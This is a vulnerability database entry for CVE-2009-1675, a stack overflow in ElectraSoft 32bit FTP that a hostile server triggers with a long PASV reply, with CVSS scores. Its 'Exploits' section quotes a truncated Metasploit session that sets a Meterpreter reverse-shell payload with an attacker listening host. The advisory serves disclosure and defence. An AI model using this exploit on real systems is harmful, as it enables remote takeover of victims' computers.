9.3
CVSSv2

CVE-2009-1675

Published: 18/05/2009 Updated: 29/09/2017
CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6
VMScore: 935
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Vulnerability Summary

Stack-based buffer overflow in ElectraSoft 32bit FTP 09.04.24 allows remote FTP servers to execute arbitrary code via a long 227 reply to a PASV command.

Vulnerable Product Search on Vulmon Subscribe to Product

electrasoft 32bit ftp 09.04.24

Exploits

#msf > use exploit/windows/ftp/32bitftp_pasv_reply #msf exploit(32bitftp_pasv) > set PAYLOAD windows/meterpreter/reverse_tcp #PAYLOAD => windows/meterpreter/reverse_tcp #msf exploit(32bitftp_pasv) > set LHOST 19216812 #LHOST => 19216812 #msf exploit(32bitftp_pasv) ...